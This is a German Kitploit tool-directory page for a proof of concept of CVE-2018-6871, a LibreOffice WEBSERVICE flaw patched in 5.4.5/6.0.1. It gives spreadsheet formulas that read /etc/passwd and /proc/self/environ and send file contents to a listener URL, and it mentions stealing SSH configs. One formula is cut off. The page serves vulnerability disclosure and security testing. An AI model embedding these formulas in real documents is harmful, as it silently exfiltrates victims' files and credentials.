Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
libreoffice-remote-arbitrary-file-disclosure — Beweis des Konzepts der Schwachstelle zur entfernten Offenlegung beliebiger Dateien in LibreOffice | Kitploit
Tools/GitHubGitHub/jollheef/libreoffice-remote-arbitrary-file-disclosure
SchwachstellenanalyseExploitationDatenexfiltrationInformationsbeschaffung
GitHubjollheef/libreoffice-remote-arbitrary-file-disclosure

libreoffice-remote-arbitrary-file-disclosure

Beweis des Konzepts der Schwachstelle zur entfernten Offenlegung beliebiger Dateien in LibreOffice

Repository anzeigen
9693vor 8 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Schwachstellenbeschreibung

CVE-2018-6871

Erster Teil

LibreOffice unterstützt die Funktion COM.MICROSOFT.WEBSERVICE:

root@kitploit:~
https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4

Die Funktion wird benötigt, um Daten per URL abzurufen, normalerweise verwendet als:

root@kitploit:~
=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")

Im Original:

root@kitploit:~
For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.

In LibreOffice wurden diese Einschränkungen vor den Versionen 5.4.5/6.0.1 nicht implementiert.

Zweiter Teil

Standardmäßig werden die Zellen nicht aktualisiert, aber wenn Sie den Zelltyp wie ~error angeben, wird die Zelle beim Öffnen des Dokuments aktualisiert.

Ausnutzung

Um eine Datei zu lesen, brauchen Sie nur:

root@kitploit:~
=WEBSERVICE("/etc/passwd")

Diese Funktion kann auch verwendet werden, um eine Datei zu senden:

root@kitploit:~
=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))

Für einen erfolgreichen Vorgang müssen Sie die Dateien des aktuellen Benutzers senden, daher müssen Sie den Home-Pfad des aktuellen Benutzers ermitteln.

root@kitploit:~
=MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",

Sie können auch andere Dateien parsen, wie z. B. eine ~/.ssh/config oder Ähnliches.

Für andere Formate als LibreOffice Calc müssen Sie das Calc-Objekt nur in ein anderes Dokument einbetten (ich habe geprüft, dass es funktioniert).

Auswirkungen

Es ist leicht, beliebige Dateien mit Schlüsseln, Passwörtern und allem anderen zu senden. 100% Erfolgsrate, völlig lautlos, betrifft LibreOffice in Versionen vor 5.4.5/6.0.1 auf allen Betriebssystemen (GNU/Linux, MS Windows, macOS usw.) und kann in fast allen von LO unterstützten Formaten eingebettet werden.

Danksagung

Die Schwachstelle wurde unabhängig von mir (@jollheef) und Ronnie Goodrich && Andrew Krasichkov gefunden (laut den Notizen des LibreOffice-Teams).

Tool herunterladen